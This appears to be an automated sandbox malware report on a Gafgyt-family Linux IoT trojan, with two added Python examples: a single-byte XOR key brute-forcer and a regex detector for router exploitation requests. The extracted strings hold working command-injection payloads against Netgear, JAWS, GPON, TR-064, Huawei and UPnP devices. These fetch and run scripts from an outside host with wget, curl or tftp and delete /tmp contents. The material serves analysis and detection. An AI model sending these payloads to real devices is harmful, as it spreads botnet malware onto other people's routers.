Source: yNGgbod6dt.elf | ReversingLabs: Detection: 41% |
Source: yNGgbod6dt.elf | Virustotal: Detection: 49% | Perma Link |
Source: yNGgbod6dt.elf | String: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> |
Source: yNGgbod6dt.elf | String: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1 |
Source: global traffic | TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic | TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: global traffic | TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.173.195.220 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.173.195.220 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.107.216.65 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/diag00/log21.mips |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh; |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh;chmod$ |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh;sh |
Source: yNGgbod6dt.elf | String found in binary or memory: http://purenetworks.com/HNAP1/ |
Source: yNGgbod6dt.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: yNGgbod6dt.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: yNGgbod6dt.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown |
Source: yNGgbod6dt.elf, type: SAMPLE | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13 |
Source: yNGgbod6dt.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16 |
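The SUSP_XORed_Mozilla rule above matches a single-byte XOR of "Mozilla/5.0" but, as its description says, cannot report the key. The following is an added example (not code from the report, the rule author or the sample) that recovers the key and the surrounding string offline; the byte buffer it scans is constructed for the demo and DEMO_KEY is an arbitrary choice.

```python
# Added example (not from the report or the sample): brute-force the
# single-byte XOR key under which a keyword such as "Mozilla/5.0" appears,
# the step the SUSP_XORed_Mozilla rule leaves to the analyst.
# The demo buffer is constructed; DEMO_KEY is an arbitrary choice.

KEYWORD = b"Mozilla/5.0"
DEMO_KEY = 0x5A


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the same single-byte key."""
    return bytes(b ^ key for b in data)


def find_xored_keyword(blob: bytes, keyword: bytes = KEYWORD, window: int = 32):
    """Return (key, offset, decoded_window) for each place where keyword
    occurs in blob under some single-byte XOR key. Key 0 means plaintext.
    Searching for keyword ^ key in the raw bytes avoids decoding the whole
    blob 256 times."""
    hits = []
    for key in range(256):
        needle = xor_bytes(keyword, key)
        start = 0
        while (off := blob.find(needle, start)) != -1:
            hits.append((key, off, xor_bytes(blob[off:off + window], key)))
            start = off + 1
    return hits


def build_demo_blob(key: int = DEMO_KEY) -> bytes:
    """Constructed stand-in for a binary: an ELF magic, padding, then a
    User-Agent string stored XORed with key."""
    ua = b"User-Agent: Mozilla/5.0 (X11; Linux x86_64)\x00"
    return b"\x7fELF" + b"\x00" * 16 + xor_bytes(ua, key) + b"\x00" * 8


if __name__ == "__main__":
    for key, off, ctx in find_xored_keyword(build_demo_blob()):
        print(f"key=0x{key:02x} offset={off} -> {ctx!r}")
```

Point it at the real sample with `find_xored_keyword(open("yNGgbod6dt.elf", "rb").read())`; the decoded window gives the full User-Agent string, which is usually the one the bot sends during HTTP flooding or scanning, and once the key is known the same XOR can be applied to the rest of the string table.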
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: Initial sample | Potential command found: GET /shell?rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/jaws;sh+jaws HTTP/1.1 |
Source: Initial sample | Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.sh |
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
Source: Initial sample | Potential command found: GET / |
Source: Initial sample | Potential command found: GET /%s HTTP/1.0 |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0 |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope> |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.shPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /HNAP1/ HTTP/1.0 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>%d.%d.%d.%dGET /HEAD /POST /HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: /bin/busybox |
Source: Initial sample | String containing 'busybox' found: bin/busybox |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f |
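The exploitation strings listed above (Netgear setup.cgi syscmd, JAWS /shell, GPON diag_Form ping injection, TR-064 SetNTPServers, Huawei /ctrlt/DeviceUpgrade_1, UPnP AddPortMapping and the `${IFS}` path injection) are what this bot sends to spread, so they are also what an edge device's HTTP logs will contain when it is being scanned. The following is an added example (not code from the report or the sample) of signature checks for those request shapes, run over a few constructed request lines whose payloads are copied from the strings in this report; the rule names are my own labels and the stager host is the one the report's download URLs point at.

```python
import re
from urllib.parse import unquote_plus

# Added example (not from the report or the sample): signature checks for the
# exploitation requests whose strings appear in this report, run over a few
# constructed HTTP request lines / bodies. Rule names are my own labels.

STAGER_HOST = "89.208.107.26"   # stager host taken from the report's download URLs

# Each pattern targets a request shape present verbatim in the sample's strings;
# they are applied to the URL-decoded request so "+" and %XX encoding don't matter.
RULES = [
    ("netgear_setup_cgi_syscmd",   re.compile(r"/setup\.cgi\?.*todo=syscmd.*cmd=")),
    ("jaws_shell_rce",             re.compile(r"/shell\?.*\b(wget|curl|tftp)\b")),
    ("board_cgi_cmd",              re.compile(r"/board\.cgi\?cmd=")),
    ("gpon_diag_ping_inject",      re.compile(r"diag_action=ping.*dest_host=`")),
    ("tr064_setntpservers_cmd",    re.compile(r"SetNTPServers.*<NewNTPServer1>`")),
    ("huawei_upnp_upgrade_cmd",    re.compile(r"/ctrlt/DeviceUpgrade_1|<NewStatusURL>\$\(")),
    ("upnp_addportmapping_inject", re.compile(r"AddPortMapping.*<NewInternalClient>`")),
    ("ifs_shell_inject",           re.compile(r"\$\{IFS\}")),
]
# a downloader command in the payload, up to the next shell separator
DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp)\b[^;&|`]*")


def classify(request: str) -> dict:
    """Return matched rule names, downloader commands and whether the request
    points at the stager host named in the report."""
    decoded = unquote_plus(request)
    return {
        "rules": [name for name, rx in RULES if rx.search(decoded)],
        "downloads": [d.strip() for d in DOWNLOADER.findall(decoded)],
        "known_stager": STAGER_HOST in decoded,
    }


def triage(requests):
    """Map each request to its classification; only flagged ones are returned."""
    out = {}
    for req in requests:
        c = classify(req)
        if c["rules"] or c["known_stager"]:
            out[req] = c
    return out


# Constructed log lines: payloads copied from the strings above, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0",
    "GET /shell?rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/jaws;sh+jaws HTTP/1.1",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0",
    "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0",
    "GET /index.html HTTP/1.1",
]

if __name__ == "__main__":
    for req, c in triage(SAMPLE_REQUESTS).items():
        print(c["rules"], c["downloads"], "stager" if c["known_stager"] else "", req[:60])
```

Two details worth keeping in mind when turning this into production detection: the payloads are URL-decoded before matching because every request on this page hides spaces as `+` or `${IFS}`, and the stager-host check is deliberately separate from the rule list, since the host will rotate long before the request shapes do. Note also that the UPnP AddPortMapping payload ends with `iptables -A INPUT -p tcp --destination-port 5555 -j DROP`, so an infected device stops answering on TCP/5555 (the default port for ADB over TCP); a host that previously exposed 5555 and suddenly drops it is itself a weak indicator.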
Source: classification engine | Classification label: mal76.spre.troj.linELF@0/0@0/0 |
Source: Yara match | File source: yNGgbod6dt.elf, type: SAMPLE |